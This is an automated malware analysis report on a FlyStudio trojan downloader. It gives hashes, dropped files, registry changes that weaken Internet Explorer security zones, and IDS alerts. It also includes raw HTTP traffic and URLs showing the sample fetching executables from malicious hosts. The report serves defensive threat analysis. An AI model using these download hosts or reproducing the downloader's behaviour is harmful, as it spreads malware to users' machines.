Trojan.Win32.FlyStudio_93b111c1a0
HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 93b111c1a0a31e76b5729574bbdece6d
SHA1: 8c16e05b80405092310ee78d4e0d9dbdf39f3dbf
SHA256: 4da272d4d9de237b32daf9a6a234c69c1874d027e346d699a31192798d500eac
SSDeep: 12288:8XjMVYN6X4sWlRig2J7ClvZxVLvUoyUoKQt5ynmePVvO/xwV15:8Xu06XJMz GlL99yU 3ccM
Size: 723968 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-29 23:29:30
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup_30004.exe:2012
syunbo_53_1248.exe:1300
The Trojan injects its code into the following process(es):
%original file name%.exe:400
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process setup_30004.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\anote\Alarm.wav (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
%Program Files%\anote\uninstall.exe (2392 bytes)
%Program Files%\anote\anote.dat (286 bytes)
%Program Files%\anote\Language\chinese.ini (2 bytes)
%Documents and Settings%\%current user%\Desktop\多彩便签.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\öÃâ€ÃƒËœ.lnk (1 bytes)
%Program Files%\anote\cfg.ini (124 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\多彩便签.lnk (1 bytes)
%Program Files%\anote\anote.exe (36078 bytes)
%Program Files%\anote\about.jpg (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
%Program Files%\anote\anote.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\多彩便签\帮助.lnk (286 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsuD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\anote.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
The process %original file name%.exe:400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\syunbo_53_1248.exe (6396 bytes)
The process syunbo_53_1248.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\dBwBAAAAAAAA (207286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\setup_30004.exe (34350 bytes)
Registry activity
The process setup_30004.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\anote]
"anote" = "noteupdateservice"
"fixid" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoModify" = "1"
[HKCR\Applications\anote.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"Names" = "noteupdateservice"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"InstallDate" = "20140812"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\anote\data]
"runtime" = "65000"
"LastVersion" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\anote]
"Version" = "1.35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCR\CLSID\{F481F745-5C57-4f71-95B4-78546706C7A9}]
"QI" = "000C29AC63984C23B2F35C8C20B50EF2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"UninstallString" = "%Program Files%\anote\uninstall.exe _?=%Program Files%\anote"
[HKLM\SOFTWARE\anote]
"IconIndex" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayIcon" = "%Program Files%\anote\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"DisplayName" = "anote (v1.35)"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 BB FA A7 8B 50 D5 ED 3E B0 BE F5 5C 21 DD A9"
[HKLM\SOFTWARE\anote]
"Count" = "1"
"instname" = "setup_30004.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\anote\data]
"rdata" = "bgQOVG8eWhYLCGQZGUQRVx5RC1YLB3F4S31vaQsYaBIuHX9AbWdrTxFpHW8IHQg5dHw8f2JpBVsnUQROVCthEHZPEx8XAgMZWUpxCBkKOhpeG29BXRpZQWMREEsWH01PXk9YHnZdVUg6RFtKMVw1X00Xe1VECk5EQ15eBX4DMFUVST5Y"
[HKLM\SOFTWARE\anote]
"(Default)" = "%Program Files%\anote"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{AA88D2B1-F3C6-4557-B709-06894DD6B6C0}]
"NoRepair" = "1"
[HKLM\SOFTWARE\anote]
"Options" = "1"
[HKCR\Applications\Uninstall.exe]
"NoStartPage" = ""
[HKLM\SOFTWARE\anote]
"InstallTime" = "2015812"
The process %original file name%.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 24 3F 05 4E D1 D5 F0 64 98 36 23 7E 5C 56 F8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process syunbo_53_1248.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"setup_30004.exe" = "Muti Color Note"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 7C 66 57 A6 02 CE 62 54 4D FE B9 4B D0 2A 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 272edafd76205919cd3f5218cd14d247 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe |
| bfbe9995a89f75b55fdc9b756a41cbb7 | c:\Program Files\anote\anote.dll |
| 44fc98f03e2270629e9f9b19d6200588 | c:\Program Files\anote\anote.exe |
| 8eb8239f10f026307a10c9c3a71c5106 | c:\Program Files\anote\uninstall.exe |
| 272edafd76205919cd3f5218cd14d247 | c:\Program Files\setup_30004.exe |
| 1a1f4c4066d1d49db10b2b273b4efd9c | c:\syunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 671744 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 675840 | 524288 | 521728 | 5.37025 | f2a991e53cdcbbcb9355c64f56504a1f |
| .rsrc | 1200128 | 204800 | 201216 | 4.47958 | 00414c43d8e228c2c17539fdd4adb18f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://d.juezhao123.com/setup/setup_30004.exe | |
| hxxp://www.jiuhuabuy.com/kuplay/930/871248/ | |
| hxxp://120.55.137.126/1439353161-930-871248/ | |
| hxxp://rawtj.photo.store.qq.com/psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA | |
| hxxp://image.juezhao123.com/img/30004.jpg?t=1930351 | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET CURRENT_EVENTS Potential Fast Flux Rogue Antivirus (Setup_245.exe)
GPL SHELLCODE x86 NOOP
Traffic
GET /img/30004.jpg?t=1930351 HTTP/1.0
Host: image.juezhao123.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Wed, 12 Aug 2015 04:15:56 GMT
Content-Type: image/jpeg
Content-Length: 243
Last-Modified: Sat, 08 Aug 2015 04:10:03 GMT
Connection: close
Accept-Ranges: bytes
[Settings]
iconindex=1
pos=
width=550
height=400
border=10
tooltip=0
titleheight=50
trayiconindex=0
showstatus=0
transparent=10%
newwidth=0
newheight=0
anote=100
noteupdateservice=1
menucolor=2
sand=65000
float=1
order=desc
GET /psb?/V11ocPuK4Lde3Q/o1lxhiN1xUeN16I9G2IBO1NuWCYmmN8D3gGbpJxI0bE!/r/dBwBAAAAAAAA HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: rawtj.photo.store.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=94608000
Content-Length: 12293787
Content-Type: image/gif
Expires: Mon, 5 Dec 2050 07:25:14 GMT
Last-Modified: Mon, 18 Dec 2006 07:25:14 GMT
Server: httpserver
GET /kuplay/930/871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.jiuhuabuy.com
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Aug 2015 04:19:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
location: hXXp://120.55.137.126/1439353161-930-871248/
GET /1439353161-930-871248/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 120.55.137.126
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 04:19:26 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Disposition: attachment; filename=bobolicjlhgabdh.exe
Set-Cookie: route=;Path=/
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 12 Aug 2015 12:08:14 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
The Trojan connects to the servers at the following location(s):
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
C:\syunbo_53_1248.exe
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
C:\jufilo_930_871248.exe
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
c:\%original file name%.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
ShellExecuteA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
.text
`.rdata
@.data
.rsrc
J.text
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)
%original file name%.exe_400_rwx_00401000_00123000:
syunbo_53_1248.exe_1300:
.text
`.rdata
@.data
.rsrc
@.reloc
Internal error clearing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
smtp
;type=%c
Send failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
